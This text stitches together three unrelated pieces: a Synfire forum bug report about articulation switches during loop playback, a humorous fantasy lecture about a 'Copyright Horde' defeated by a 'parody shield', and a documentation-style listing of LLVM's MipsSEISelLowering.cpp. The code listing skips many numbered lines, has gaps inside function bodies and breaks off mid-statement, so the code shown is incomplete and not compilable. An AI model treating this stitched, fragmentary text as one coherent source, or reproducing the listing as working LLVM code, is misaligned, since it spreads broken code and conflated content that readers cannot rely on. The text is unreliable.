Articulation of next container overwriting current container 3 posts / 0 new Letzter Beitrag Bild des Benutzers kunterbunt kunterbunt Offline Last seen vor 6 Monate 1 Woche Articulation of next container overwriting current container Software Version: Synfire 1.8.5 build 5 OS: Windows 10 Bug: Misbehaviour Reproduce-ability: 100% Reproduction steps 1. Create a new Arrangement 2. Create a new container with the size of 2 bars and call it Spiccatissimo 3. Draw a figure into the first bar of the container 4. Assign an articulation to the figure, in this case Spiccatissimo 5. Create a duplicate of that container and rename it to Staccato 6. Move the new container after the first container 7. Change the articulation of the second container figure to a different articulation than the figure of the first container, in this case Staccato 8. Select the range of the second bar for playback 9. loop playback 10. First time it plays correctly. The first figure with the first articulation 11. After that it will play the first figure using the articulation of the second figure articulation_overwrite.png P.S. I attached the sample project. Not sure if it can be used to reproduce. Bild des Benutzers andre andre Offline Last seen vor 2 Tage 13 Stunden Thanks for sharing your observations. Loop playback has a number of side effects and this is one of them. The articulation switch is sent shortly before the first note of a segment. That's why at the end of the loop, the articulation of the following segment is already sent, only milliseconds before it returns to the beginning for the next loop. There, the articulation switch of the first segment is a few milliseconds before the loop start, hence not sent again during a loop. Articulation switches take some time to go into effect. They can't therefore be tied exactly to the playback of a note. Their shifting has the said side effects. Bild des Benutzers kunterbunt kunterbunt Offline Last seen vor 6 Monate 1 Woche Well, then your loop playback needs to look ahead and plan ahead. It makes things more complex, but otherwise it gets unlogical for the user. Zum Verfassen von Kommentaren bitte Anmelden oder Registrieren. Scholarly Lite is a free theme, contributed to the Drupal Community by More than Themes.
__label__pos
0.570626
The Rise of Parody This is an excerpt from Dr. Silly Freehold’s talk, “The rise of parody.” This was given in Boar’s Blemish University on the 15th anniversary of Invocation Day – 3 years after the War of Injunction ended. You all, of course, know the story of the early days of the war. In Spring 225 1 the Great Firewall in the Pass of Commons was brought completely down by the Copyright Horde. The 17th and 34th Gnomish divisions were routed, but quickly regrouped and fell back toward the mines of Great Roll. They fought valiantly as they retreated, drawing the bulk of the Horde’s forces after them as they fell back. Many of these brave Gnomes were the first to be wounded with the Horde’s “fade-rounds,” their names and contributions to the fight now lost to us. Survivors tell of a desperate struggle to keep back the Horde from the civilian population until it could be evacuated under the Copper Mountains. As I said, it was a valiant effort, but it also left the city of Boar’s Blemish, just slightly to the North and East of the Pass of Commons, exposed to a Horde attack. The 17th Gnomish Infantry had attempted to fall back towards the city once the firewall had fallen, but were ambushed by a brigade of Patent Trolls who had somehow managed to get in front of them. Despite a numerical advantage, the Gnomes were no match for the aggressive trolls, and sustained nearly 50% casualties before linking back up with the 34th and it’s heroic stand. In desperation the Principal of Boar’s Blemish called to The Empty Throne for reinforcements, only to be told that none would be forthcoming. The Realm had not been prepared for war. The Dwarves of Red Mine we’re busy creating a software patch for the collapsed firewall, and wouldn’t be able to have an impact on the changing situation until they came out with new code, hopefully in the coming year. The Darned Elves will still refusing to take the field until they got what they felt was a fair exchange rate between socks and pennies 2. The Penny Gnomes, as I said, were preoccupied with saving the population around Great Roll. The Classics, as usual, ignored all calls for help. The Magicasters were on their own, and believed they had less than three days before the bulk of the Copyright Horde was in position to attack their city. It was then one of the greatest intelligence triumphs of the war occurred. Late one night, four days after the Great Firewall had collapsed, a lone Lawyer approached the Magicaster pickets and indicated a desire to defect. From this lone warrior the armed forces of The Realm learned the strategies governing the current invasion, as well as some insight into the nature of the Copyright Horde itself (which we’ll cover in tomorrow’s lecture). Of particular interest to the defenders in and around Boar’s Blemish was intelligence on a new type of weapon which the Horde intended to unleash upon the city, an injunction bomb. While the injunction had been a useful tool against individual soldiers or units, the Horde had not yet been able to make an injunction stick against an entire population center – there was nothing “infringing enough” to write an injunction which would hold against wide area. The Magicasters, however, with their presumed similarities towards certain Actualized Works 3 provided the Horde their first opportunity unleash the full power of their injunction weapons. The news of this bomb created great alarm within the city and among its defenders – the threat of an injunction bomb was truly terrifying. Yet the Horde’s tactic also provided the city’s hope of deliverance. Within hours of discovering their impending danger, the Magicasters of Boar’s Blemish began devising a novel defense for their imperiled town. They set about developing The Realm’s first parody shield. With speed and desperation born through terror, the Magicasters rewrote the town charter to retcon it’s history. The town scribes changed both the town name and the identity of those who lived there into forms which betrayed an obvious, yet slightly warped, tie to certain Actualized Works – thus breaking the power of the injunction. It was a dangerous chance, if the Parody Shield failed then Boar’s Blemish would almost certainly cease to exist. Six days later, when the Horde finally moved on the isolated city, the injunction bomb was finally detonated. It did no damage. Confused and demoralized, the Horde paused in their attack. Instead of moving on a devastated city and capturing defeated survivors, The Horde was faced with a suddenly confident enemy which was suddenly immune to their most powerful weapon. In their confusion, the defenders of Boar’s Blemish took to the offensive and began the process of driving the enemy from their boundaries. Six weeks from day the firewall came down, the bulk of The Horde had been pushed back through the Pass of Commons. The Realm would survive to fight another day. 1. The current calendar in The Realm begins with the establishment of the first US Patent Act. No one knows why, and the pixies aren’t saying.  2. The Darned Elves hold that the best basis for currency in The Realm is a single sock, taken from a dryer in the real world. The rest of The Realm is quite happy on the Penny Standard.  3. Even years after the Copyright Horde was defeated the citizens of The Realm were wary of referring to Actualized Works by name – they remembered how such mentions were used a targeting beacons during the war. 
__label__pos
0.65727
LLVM  6.0.0svn MipsSEISelLowering.cpp Go to the documentation of this file. 1 //===- MipsSEISelLowering.cpp - MipsSE DAG Lowering Interface -------------===// 2 // 3 // The LLVM Compiler Infrastructure 4 // 5 // This file is distributed under the University of Illinois Open Source 6 // License. See LICENSE.TXT for details. 7 // 8 //===----------------------------------------------------------------------===// 9 // 10 // Subclass of MipsTargetLowering specialized for mips32/64. 11 // 12 //===----------------------------------------------------------------------===// 13  14 #include "MipsSEISelLowering.h" 15 #include "MipsMachineFunction.h" 16 #include "MipsRegisterInfo.h" 17 #include "MipsSubtarget.h" 18 #include "llvm/ADT/APInt.h" 19 #include "llvm/ADT/ArrayRef.h" 20 #include "llvm/ADT/STLExtras.h" 21 #include "llvm/ADT/SmallVector.h" 22 #include "llvm/ADT/Triple.h" 37 #include "llvm/IR/DebugLoc.h" 38 #include "llvm/IR/Intrinsics.h" 39 #include "llvm/Support/Casting.h" 41 #include "llvm/Support/Debug.h" 45 #include <algorithm> 46 #include <cassert> 47 #include <cstdint> 48 #include <iterator> 49 #include <utility> 50  51 using namespace llvm; 52  53 #define DEBUG_TYPE "mips-isel" 54  55 static cl::opt<bool> 56 UseMipsTailCalls("mips-tail-calls", cl::Hidden, 57  cl::desc("MIPS: permit tail calls."), cl::init(false)); 58  59 static cl::opt<bool> NoDPLoadStore("mno-ldc1-sdc1", cl::init(false), 60  cl::desc("Expand double precision loads and " 61  "stores to their single precision " 62  "counterparts")); 63  65  const MipsSubtarget &STI) 66  : MipsTargetLowering(TM, STI) { 67  // Set up the register classes 68  addRegisterClass(MVT::i32, &Mips::GPR32RegClass); 69  70  if (Subtarget.isGP64bit()) 71  addRegisterClass(MVT::i64, &Mips::GPR64RegClass); 72  73  if (Subtarget.hasDSP() || Subtarget.hasMSA()) { 74  // Expand all truncating stores and extending loads. 75  for (MVT VT0 : MVT::vector_valuetypes()) { 76  for (MVT VT1 : MVT::vector_valuetypes()) { 77  setTruncStoreAction(VT0, VT1, Expand); 81  } 82  } 83  } 84  85  if (Subtarget.hasDSP()) { 87  88  for (unsigned i = 0; i < array_lengthof(VecTys); ++i) { 89  addRegisterClass(VecTys[i], &Mips::DSPRRegClass); 90  91  // Expand all builtin opcodes. 92  for (unsigned Opc = 0; Opc < ISD::BUILTIN_OP_END; ++Opc) 93  setOperationAction(Opc, VecTys[i], Expand); 94  95  setOperationAction(ISD::ADD, VecTys[i], Legal); 96  setOperationAction(ISD::SUB, VecTys[i], Legal); 97  setOperationAction(ISD::LOAD, VecTys[i], Legal); 98  setOperationAction(ISD::STORE, VecTys[i], Legal); 100  } 101  107  } 108  109  if (Subtarget.hasDSPR2()) 111  112  if (Subtarget.hasMSA()) { 113  addMSAIntType(MVT::v16i8, &Mips::MSA128BRegClass); 114  addMSAIntType(MVT::v8i16, &Mips::MSA128HRegClass); 115  addMSAIntType(MVT::v4i32, &Mips::MSA128WRegClass); 116  addMSAIntType(MVT::v2i64, &Mips::MSA128DRegClass); 117  addMSAFloatType(MVT::v8f16, &Mips::MSA128HRegClass); 118  addMSAFloatType(MVT::v4f32, &Mips::MSA128WRegClass); 119  addMSAFloatType(MVT::v2f64, &Mips::MSA128DRegClass); 120  121  // f16 is a storage-only type, always promote it to f32. 122  addRegisterClass(MVT::f16, &Mips::MSA128HRegClass); 158  164  } 165  166  if (!Subtarget.useSoftFloat()) { 167  addRegisterClass(MVT::f32, &Mips::FGR32RegClass); 168  169  // When dealing with single precision only, use libcalls 170  if (!Subtarget.isSingleFloat()) { 171  if (Subtarget.isFP64bit()) 172  addRegisterClass(MVT::f64, &Mips::FGR64RegClass); 173  else 174  addRegisterClass(MVT::f64, &Mips::AFGR64RegClass); 175  } 176  } 177  182  183  if (Subtarget.hasCnMips()) 185  else if (Subtarget.isGP64bit()) 187  188  if (Subtarget.isGP64bit()) { 195  } 196  199  205  207  211  212  if (NoDPLoadStore) { 215  } 216  217  if (Subtarget.hasMips32r6()) { 218  // MIPS32r6 replaces the accumulator-based multiplies with a three register 219  // instruction 225  226  // MIPS32r6 replaces the accumulator-based division/remainder with separate 227  // three register division and remainder instructions. 234  235  // MIPS32r6 replaces conditional moves with an equivalent that removes the 236  // need for three GPR read ports. 240  244  245  assert(Subtarget.isFP64bit() && "FR=1 is required for MIPS32r6"); 249  251  252  // Floating point > and >= are supported via < and <= 257  262  } 263  264  if (Subtarget.hasMips64r6()) { 265  // MIPS64r6 replaces the accumulator-based multiplies with a three register 266  // instruction 272  273  // MIPS32r6 replaces the accumulator-based division/remainder with separate 274  // three register division and remainder instructions. 281  282  // MIPS64r6 replaces conditional moves with an equivalent that removes the 283  // need for three GPR read ports. 287  } 288  290 } 291  292 const MipsTargetLowering * 294  const MipsSubtarget &STI) { 295  return new MipsSETargetLowering(TM, STI); 296 } 297  298 const TargetRegisterClass * 300  if (VT == MVT::Untyped) 301  return Subtarget.hasDSP() ? &Mips::ACC64DSPRegClass : &Mips::ACC64RegClass; 302  304 } 305  306 // Enable MSA support for the given integer type and Register class. 309  addRegisterClass(Ty, RC); 310  311  // Expand all builtin opcodes. 312  for (unsigned Opc = 0; Opc < ISD::BUILTIN_OP_END; ++Opc) 313  setOperationAction(Opc, Ty, Expand); 314  321  339  340  if (Ty == MVT::v4i32 || Ty == MVT::v2i64) { 345  } 346  353 } 354  355 // Enable MSA support for the given floating-point type and Register class. 358  addRegisterClass(Ty, RC); 359  360  // Expand all builtin opcodes. 361  for (unsigned Opc = 0; Opc < ISD::BUILTIN_OP_END; ++Opc) 362  setOperationAction(Opc, Ty, Expand); 363  370  371  if (Ty != MVT::v8f16) { 383  391  } 392 } 393  394 SDValue MipsSETargetLowering::lowerSELECT(SDValue Op, SelectionDAG &DAG) const { 395  if(!Subtarget.hasMips32r6()) 396  return MipsTargetLowering::LowerOperation(Op, DAG); 397  398  EVT ResTy = Op->getValueType(0); 399  SDLoc DL(Op); 400  401  // Although MTC1_D64 takes an i32 and writes an f64, the upper 32 bits of the 402  // floating point register are undefined. Not really an issue as sel.d, which 403  // is produced from an FSELECT node, only looks at bit 0. 404  SDValue Tmp = DAG.getNode(MipsISD::MTC1_D64, DL, MVT::f64, Op->getOperand(0)); 405  return DAG.getNode(MipsISD::FSELECT, DL, ResTy, Tmp, Op->getOperand(1), 406  Op->getOperand(2)); 407 } 408  409 bool 411  unsigned, 412  unsigned, 413  bool *Fast) const { 415  417  // MIPS32r6/MIPS64r6 is required to support unaligned access. It's 418  // implementation defined whether this is handled by hardware, software, or 419  // a hybrid of the two but it's expected that most implementations will 420  // handle the majority of cases in hardware. 421  if (Fast) 422  *Fast = true; 423  return true; 424  } 425  426  switch (SVT) { 427  case MVT::i64: 428  case MVT::i32: 429  if (Fast) 430  *Fast = true; 431  return true; 432  default: 433  return false; 434  } 435 } 436  438  SelectionDAG &DAG) const { 439  switch(Op.getOpcode()) { 440  case ISD::LOAD: return lowerLOAD(Op, DAG); 441  case ISD::STORE: return lowerSTORE(Op, DAG); 442  case ISD::SMUL_LOHI: return lowerMulDiv(Op, MipsISD::Mult, true, true, DAG); 443  case ISD::UMUL_LOHI: return lowerMulDiv(Op, MipsISD::Multu, true, true, DAG); 444  case ISD::MULHS: return lowerMulDiv(Op, MipsISD::Mult, false, true, DAG); 445  case ISD::MULHU: return lowerMulDiv(Op, MipsISD::Multu, false, true, DAG); 446  case ISD::MUL: return lowerMulDiv(Op, MipsISD::Mult, true, false, DAG); 447  case ISD::SDIVREM: return lowerMulDiv(Op, MipsISD::DivRem, true, true, DAG); 448  case ISD::UDIVREM: return lowerMulDiv(Op, MipsISD::DivRemU, true, true, 449  DAG); 450  case ISD::INTRINSIC_WO_CHAIN: return lowerINTRINSIC_WO_CHAIN(Op, DAG); 451  case ISD::INTRINSIC_W_CHAIN: return lowerINTRINSIC_W_CHAIN(Op, DAG); 452  case ISD::INTRINSIC_VOID: return lowerINTRINSIC_VOID(Op, DAG); 453  case ISD::EXTRACT_VECTOR_ELT: return lowerEXTRACT_VECTOR_ELT(Op, DAG); 454  case ISD::BUILD_VECTOR: return lowerBUILD_VECTOR(Op, DAG); 455  case ISD::VECTOR_SHUFFLE: return lowerVECTOR_SHUFFLE(Op, DAG); 456  case ISD::SELECT: return lowerSELECT(Op, DAG); 457  } 458  459  return MipsTargetLowering::LowerOperation(Op, DAG); 460 } 461  462 // Fold zero extensions into MipsISD::VEXTRACT_[SZ]EXT_ELT 463 // 464 // Performs the following transformations: 465 // - Changes MipsISD::VEXTRACT_[SZ]EXT_ELT to zero extension if its 466 // sign/zero-extension is completely overwritten by the new one performed by 467 // the ISD::AND. 468 // - Removes redundant zero extensions performed by an ISD::AND. 471  const MipsSubtarget &Subtarget) { 472  if (!Subtarget.hasMSA()) 473  return SDValue(); 474  475  SDValue Op0 = N->getOperand(0); 476  SDValue Op1 = N->getOperand(1); 477  unsigned Op0Opcode = Op0->getOpcode(); 478  479  // (and (MipsVExtract[SZ]Ext $a, $b, $c), imm:$d) 480  // where $d + 1 == 2^n and n == 32 481  // or $d + 1 == 2^n and n <= 32 and ZExt 482  // -> (MipsVExtractZExt $a, $b, $c) 483  if (Op0Opcode == MipsISD::VEXTRACT_SEXT_ELT || 484  Op0Opcode == MipsISD::VEXTRACT_ZEXT_ELT) { 486  487  if (!Mask) 488  return SDValue(); 489  490  int32_t Log2IfPositive = (Mask->getAPIntValue() + 1).exactLogBase2(); 491  492  if (Log2IfPositive <= 0) 493  return SDValue(); // Mask+1 is not a power of 2 494  495  SDValue Op0Op2 = Op0->getOperand(2); 496  EVT ExtendTy = cast<VTSDNode>(Op0Op2)->getVT(); 497  unsigned ExtendTySize = ExtendTy.getSizeInBits(); 498  unsigned Log2 = Log2IfPositive; 499  500  if ((Op0Opcode == MipsISD::VEXTRACT_ZEXT_ELT && Log2 >= ExtendTySize) || 501  Log2 == ExtendTySize) { 502  SDValue Ops[] = { Op0->getOperand(0), Op0->getOperand(1), Op0Op2 }; 503  return DAG.getNode(MipsISD::VEXTRACT_ZEXT_ELT, SDLoc(Op0), 504  Op0->getVTList(), 505  makeArrayRef(Ops, Op0->getNumOperands())); 506  } 507  } 508  509  return SDValue(); 510 } 511  512 // Determine if the specified node is a constant vector splat. 513 // 514 // Returns true and sets Imm if: 515 // * N is a ISD::BUILD_VECTOR representing a constant splat 516 // 517 // This function is quite similar to MipsSEDAGToDAGISel::selectVSplat. The 518 // differences are that it assumes the MSA has already been checked and the 519 // arbitrary requirement for a maximum of 32-bit integers isn't applied (and 520 // must not be in order for binsri.d to be selectable). 521 static bool isVSplat(SDValue N, APInt &Imm, bool IsLittleEndian) { 523  524  if (!Node) 525  return false; 526  527  APInt SplatValue, SplatUndef; 528  unsigned SplatBitSize; 529  bool HasAnyUndefs; 530  531  if (!Node->isConstantSplat(SplatValue, SplatUndef, SplatBitSize, HasAnyUndefs, 532  8, !IsLittleEndian)) 533  return false; 534  535  Imm = SplatValue; 536  537  return true; 538 } 539  540 // Test whether the given node is an all-ones build_vector. 541 static bool isVectorAllOnes(SDValue N) { 542  // Look through bitcasts. Endianness doesn't matter because we are looking 543  // for an all-ones value. 544  if (N->getOpcode() == ISD::BITCAST) 545  N = N->getOperand(0); 546  548  549  if (!BVN) 550  return false; 551  552  APInt SplatValue, SplatUndef; 553  unsigned SplatBitSize; 554  bool HasAnyUndefs; 555  556  // Endianness doesn't matter in this context because we are looking for 557  // an all-ones value. 558  if (BVN->isConstantSplat(SplatValue, SplatUndef, SplatBitSize, HasAnyUndefs)) 559  return SplatValue.isAllOnesValue(); 560  561  return false; 562 } 563  564 // Test whether N is the bitwise inverse of OfNode. 565 static bool isBitwiseInverse(SDValue N, SDValue OfNode) { 566  if (N->getOpcode() != ISD::XOR) 567  return false; 568  569  if (isVectorAllOnes(N->getOperand(0))) 570  return N->getOperand(1) == OfNode; 571  572  if (isVectorAllOnes(N->getOperand(1))) 573  return N->getOperand(0) == OfNode; 574  575  return false; 576 } 577  578 // Perform combines where ISD::OR is the root node. 579 // 580 // Performs the following transformations: 581 // - (or (and $a, $mask), (and $b, $inv_mask)) => (vselect $mask, $a, $b) 582 // where $inv_mask is the bitwise inverse of $mask and the 'or' has a 128-bit 583 // vector type. 586  const MipsSubtarget &Subtarget) { 587  if (!Subtarget.hasMSA()) 588  return SDValue(); 589  590  EVT Ty = N->getValueType(0); 591  592  if (!Ty.is128BitVector()) 593  return SDValue(); 594  595  SDValue Op0 = N->getOperand(0); 596  SDValue Op1 = N->getOperand(1); 597  598  if (Op0->getOpcode() == ISD::AND && Op1->getOpcode() == ISD::AND) { 599  SDValue Op0Op0 = Op0->getOperand(0); 600  SDValue Op0Op1 = Op0->getOperand(1); 601  SDValue Op1Op0 = Op1->getOperand(0); 602  SDValue Op1Op1 = Op1->getOperand(1); 603  bool IsLittleEndian = !Subtarget.isLittle(); 604  605  SDValue IfSet, IfClr, Cond; 606  bool IsConstantMask = false; 607  APInt Mask, InvMask; 608  609  // If Op0Op0 is an appropriate mask, try to find it's inverse in either 610  // Op1Op0, or Op1Op1. Keep track of the Cond, IfSet, and IfClr nodes, while 611  // looking. 612  // IfClr will be set if we find a valid match. 613  if (isVSplat(Op0Op0, Mask, IsLittleEndian)) { 614  Cond = Op0Op0; 615  IfSet = Op0Op1; 616  617  if (isVSplat(Op1Op0, InvMask, IsLittleEndian) && 618  Mask.getBitWidth() == InvMask.getBitWidth() && Mask == ~InvMask) 619  IfClr = Op1Op1; 620  else if (isVSplat(Op1Op1, InvMask, IsLittleEndian) && 621  Mask.getBitWidth() == InvMask.getBitWidth() && Mask == ~InvMask) 622  IfClr = Op1Op0; 623  624  IsConstantMask = true; 625  } 626  627  // If IfClr is not yet set, and Op0Op1 is an appropriate mask, try the same 628  // thing again using this mask. 629  // IfClr will be set if we find a valid match. 630  if (!IfClr.getNode() && isVSplat(Op0Op1, Mask, IsLittleEndian)) { 631  Cond = Op0Op1; 632  IfSet = Op0Op0; 633  634  if (isVSplat(Op1Op0, InvMask, IsLittleEndian) && 635  Mask.getBitWidth() == InvMask.getBitWidth() && Mask == ~InvMask) 636  IfClr = Op1Op1; 637  else if (isVSplat(Op1Op1, InvMask, IsLittleEndian) && 638  Mask.getBitWidth() == InvMask.getBitWidth() && Mask == ~InvMask) 639  IfClr = Op1Op0; 640  641  IsConstantMask = true; 642  } 643  644  // If IfClr is not yet set, try looking for a non-constant match. 645  // IfClr will be set if we find a valid match amongst the eight 646  // possibilities. 647  if (!IfClr.getNode()) { 648  if (isBitwiseInverse(Op0Op0, Op1Op0)) { 649  Cond = Op1Op0; 650  IfSet = Op1Op1; 651  IfClr = Op0Op1; 652  } else if (isBitwiseInverse(Op0Op1, Op1Op0)) { 653  Cond = Op1Op0; 654  IfSet = Op1Op1; 655  IfClr = Op0Op0; 656  } else if (isBitwiseInverse(Op0Op0, Op1Op1)) { 657  Cond = Op1Op1; 658  IfSet = Op1Op0; 659  IfClr = Op0Op1; 660  } else if (isBitwiseInverse(Op0Op1, Op1Op1)) { 661  Cond = Op1Op1; 662  IfSet = Op1Op0; 663  IfClr = Op0Op0; 664  } else if (isBitwiseInverse(Op1Op0, Op0Op0)) { 665  Cond = Op0Op0; 666  IfSet = Op0Op1; 667  IfClr = Op1Op1; 668  } else if (isBitwiseInverse(Op1Op1, Op0Op0)) { 669  Cond = Op0Op0; 670  IfSet = Op0Op1; 671  IfClr = Op1Op0; 672  } else if (isBitwiseInverse(Op1Op0, Op0Op1)) { 673  Cond = Op0Op1; 674  IfSet = Op0Op0; 675  IfClr = Op1Op1; 676  } else if (isBitwiseInverse(Op1Op1, Op0Op1)) { 677  Cond = Op0Op1; 678  IfSet = Op0Op0; 679  IfClr = Op1Op0; 680  } 681  } 682  683  // At this point, IfClr will be set if we have a valid match. 684  if (!IfClr.getNode()) 685  return SDValue(); 686  687  assert(Cond.getNode() && IfSet.getNode()); 688  689  // Fold degenerate cases. 690  if (IsConstantMask) { 691  if (Mask.isAllOnesValue()) 692  return IfSet; 693  else if (Mask == 0) 694  return IfClr; 695  } 696  697  // Transform the DAG into an equivalent VSELECT. 698  return DAG.getNode(ISD::VSELECT, SDLoc(N), Ty, Cond, IfSet, IfClr); 699  } 700  701  return SDValue(); 702 } 703  704 static SDValue genConstMult(SDValue X, APInt C, const SDLoc &DL, EVT VT, 705  EVT ShiftTy, SelectionDAG &DAG) { 706  // Return 0. 707  if (C == 0) 708  return DAG.getConstant(0, DL, VT); 709  710  // Return x. 711  if (C == 1) 712  return X; 713  714  // If c is power of 2, return (shl x, log2(c)). 715  if (C.isPowerOf2()) 716  return DAG.getNode(ISD::SHL, DL, VT, X, 717  DAG.getConstant(C.logBase2(), DL, ShiftTy)); 718  719  unsigned BitWidth = C.getBitWidth(); 720  APInt Floor = APInt(BitWidth, 1) << C.logBase2(); 721  APInt Ceil = C.isNegative() ? APInt(BitWidth, 0) : 722  APInt(BitWidth, 1) << C.ceilLogBase2(); 723  724  // If |c - floor_c| <= |c - ceil_c|, 725  // where floor_c = pow(2, floor(log2(c))) and ceil_c = pow(2, ceil(log2(c))), 726  // return (add constMult(x, floor_c), constMult(x, c - floor_c)). 727  if ((C - Floor).ule(Ceil - C)) { 728  SDValue Op0 = genConstMult(X, Floor, DL, VT, ShiftTy, DAG); 729  SDValue Op1 = genConstMult(X, C - Floor, DL, VT, ShiftTy, DAG); 730  return DAG.getNode(ISD::ADD, DL, VT, Op0, Op1); 731  } 732  733  // If |c - floor_c| > |c - ceil_c|, 734  // return (sub constMult(x, ceil_c), constMult(x, ceil_c - c)). 735  SDValue Op0 = genConstMult(X, Ceil, DL, VT, ShiftTy, DAG); 736  SDValue Op1 = genConstMult(X, Ceil - C, DL, VT, ShiftTy, DAG); 737  return DAG.getNode(ISD::SUB, DL, VT, Op0, Op1); 738 } 739  742  const MipsSETargetLowering *TL) { 743  EVT VT = N->getValueType(0); 744  745  if (ConstantSDNode *C = dyn_cast<ConstantSDNode>(N->getOperand(1))) 746  if (!VT.isVector()) 747  return genConstMult(N->getOperand(0), C->getAPIntValue(), SDLoc(N), VT, 748  TL->getScalarShiftAmountTy(DAG.getDataLayout(), VT), 749  DAG); 750  751  return SDValue(N, 0); 752 } 753  754 static SDValue performDSPShiftCombine(unsigned Opc, SDNode *N, EVT Ty, 755  SelectionDAG &DAG, 756  const MipsSubtarget &Subtarget) { 757  // See if this is a vector splat immediate node. 758  APInt SplatValue, SplatUndef; 759  unsigned SplatBitSize; 760  bool HasAnyUndefs; 761  unsigned EltSize = Ty.getScalarSizeInBits(); 763  764  if (!Subtarget.hasDSP()) 765  return SDValue(); 766  767  if (!BV || 768  !BV->isConstantSplat(SplatValue, SplatUndef, SplatBitSize, HasAnyUndefs, 769  EltSize, !Subtarget.isLittle()) || 770  (SplatBitSize != EltSize) || 771  (SplatValue.getZExtValue() >= EltSize)) 772  return SDValue(); 773  774  SDLoc DL(N); 775  return DAG.getNode(Opc, DL, Ty, N->getOperand(0), 776  DAG.getConstant(SplatValue.getZExtValue(), DL, MVT::i32)); 777 } 778  781  const MipsSubtarget &Subtarget) { 782  EVT Ty = N->getValueType(0); 783  784  if ((Ty != MVT::v2i16) && (Ty != MVT::v4i8)) 785  return SDValue(); 786  787  return performDSPShiftCombine(MipsISD::SHLL_DSP, N, Ty, DAG, Subtarget); 788 } 789  790 // Fold sign-extensions into MipsISD::VEXTRACT_[SZ]EXT_ELT for MSA and fold 791 // constant splats into MipsISD::SHRA_DSP for DSPr2. 792 // 793 // Performs the following transformations: 794 // - Changes MipsISD::VEXTRACT_[SZ]EXT_ELT to sign extension if its 795 // sign/zero-extension is completely overwritten by the new one performed by 796 // the ISD::SRA and ISD::SHL nodes. 797 // - Removes redundant sign extensions performed by an ISD::SRA and ISD::SHL 798 // sequence. 799 // 800 // See performDSPShiftCombine for more information about the transformation 801 // used for DSPr2. 804  const MipsSubtarget &Subtarget) { 805  EVT Ty = N->getValueType(0); 806  807  if (Subtarget.hasMSA()) { 808  SDValue Op0 = N->getOperand(0); 809  SDValue Op1 = N->getOperand(1); 810  811  // (sra (shl (MipsVExtract[SZ]Ext $a, $b, $c), imm:$d), imm:$d) 812  // where $d + sizeof($c) == 32 813  // or $d + sizeof($c) <= 32 and SExt 814  // -> (MipsVExtractSExt $a, $b, $c) 815  if (Op0->getOpcode() == ISD::SHL && Op1 == Op0->getOperand(1)) { 816  SDValue Op0Op0 = Op0->getOperand(0); 817  ConstantSDNode *ShAmount = dyn_cast<ConstantSDNode>(Op1); 818  819  if (!ShAmount) 820  return SDValue(); 821  822  if (Op0Op0->getOpcode() != MipsISD::VEXTRACT_SEXT_ELT && 824  return SDValue(); 825  826  EVT ExtendTy = cast<VTSDNode>(Op0Op0->getOperand(2))->getVT(); 827  unsigned TotalBits = ShAmount->getZExtValue() + ExtendTy.getSizeInBits(); 828  829  if (TotalBits == 32 || 830  (Op0Op0->getOpcode() == MipsISD::VEXTRACT_SEXT_ELT && 831  TotalBits <= 32)) { 832  SDValue Ops[] = { Op0Op0->getOperand(0), Op0Op0->getOperand(1), 833  Op0Op0->getOperand(2) }; 834  return DAG.getNode(MipsISD::VEXTRACT_SEXT_ELT, SDLoc(Op0Op0), 835  Op0Op0->getVTList(), 836  makeArrayRef(Ops, Op0Op0->getNumOperands())); 837  } 838  } 839  } 840  841  if ((Ty != MVT::v2i16) && ((Ty != MVT::v4i8) || !Subtarget.hasDSPR2())) 842  return SDValue(); 843  844  return performDSPShiftCombine(MipsISD::SHRA_DSP, N, Ty, DAG, Subtarget); 845 } 846  847  850  const MipsSubtarget &Subtarget) { 851  EVT Ty = N->getValueType(0); 852  853  if (((Ty != MVT::v2i16) || !Subtarget.hasDSPR2()) && (Ty != MVT::v4i8)) 854  return SDValue(); 855  856  return performDSPShiftCombine(MipsISD::SHRL_DSP, N, Ty, DAG, Subtarget); 857 } 858  859 static bool isLegalDSPCondCode(EVT Ty, ISD::CondCode CC) { 860  bool IsV216 = (Ty == MVT::v2i16); 861  862  switch (CC) { 863  case ISD::SETEQ: 864  case ISD::SETNE: return true; 865  case ISD::SETLT: 866  case ISD::SETLE: 867  case ISD::SETGT: 868  case ISD::SETGE: return IsV216; 869  case ISD::SETULT: 870  case ISD::SETULE: 871  case ISD::SETUGT: 872  case ISD::SETUGE: return !IsV216; 873  default: return false; 874  } 875 } 876  878  EVT Ty = N->getValueType(0); 879  880  if ((Ty != MVT::v2i16) && (Ty != MVT::v4i8)) 881  return SDValue(); 882  883  if (!isLegalDSPCondCode(Ty, cast<CondCodeSDNode>(N->getOperand(2))->get())) 884  return SDValue(); 885  886  return DAG.getNode(MipsISD::SETCC_DSP, SDLoc(N), Ty, N->getOperand(0), 887  N->getOperand(1), N->getOperand(2)); 888 } 889  891  EVT Ty = N->getValueType(0); 892  893  if (Ty.is128BitVector() && Ty.isInteger()) { 894  // Try the following combines: 895  // (vselect (setcc $a, $b, SETLT), $b, $a)) -> (vsmax $a, $b) 896  // (vselect (setcc $a, $b, SETLE), $b, $a)) -> (vsmax $a, $b) 897  // (vselect (setcc $a, $b, SETLT), $a, $b)) -> (vsmin $a, $b) 898  // (vselect (setcc $a, $b, SETLE), $a, $b)) -> (vsmin $a, $b) 899  // (vselect (setcc $a, $b, SETULT), $b, $a)) -> (vumax $a, $b) 900  // (vselect (setcc $a, $b, SETULE), $b, $a)) -> (vumax $a, $b) 901  // (vselect (setcc $a, $b, SETULT), $a, $b)) -> (vumin $a, $b) 902  // (vselect (setcc $a, $b, SETULE), $a, $b)) -> (vumin $a, $b) 903  // SETGT/SETGE/SETUGT/SETUGE variants of these will show up initially but 904  // will be expanded to equivalent SETLT/SETLE/SETULT/SETULE versions by the 905  // legalizer. 906  SDValue Op0 = N->getOperand(0); 907  908  if (Op0->getOpcode() != ISD::SETCC) 909  return SDValue(); 910  911  ISD::CondCode CondCode = cast<CondCodeSDNode>(Op0->getOperand(2))->get(); 912  bool Signed; 913  914  if (CondCode == ISD::SETLT || CondCode == ISD::SETLE) 915  Signed = true; 916  else if (CondCode == ISD::SETULT || CondCode == ISD::SETULE) 917  Signed = false; 918  else 919  return SDValue(); 920  921  SDValue Op1 = N->getOperand(1); 922  SDValue Op2 = N->getOperand(2); 923  SDValue Op0Op0 = Op0->getOperand(0); 924  SDValue Op0Op1 = Op0->getOperand(1); 925  926  if (Op1 == Op0Op0 && Op2 == Op0Op1) 927  return DAG.getNode(Signed ? MipsISD::VSMIN : MipsISD::VUMIN, SDLoc(N), 928  Ty, Op1, Op2); 929  else if (Op1 == Op0Op1 && Op2 == Op0Op0) 930  return DAG.getNode(Signed ? MipsISD::VSMAX : MipsISD::VUMAX, 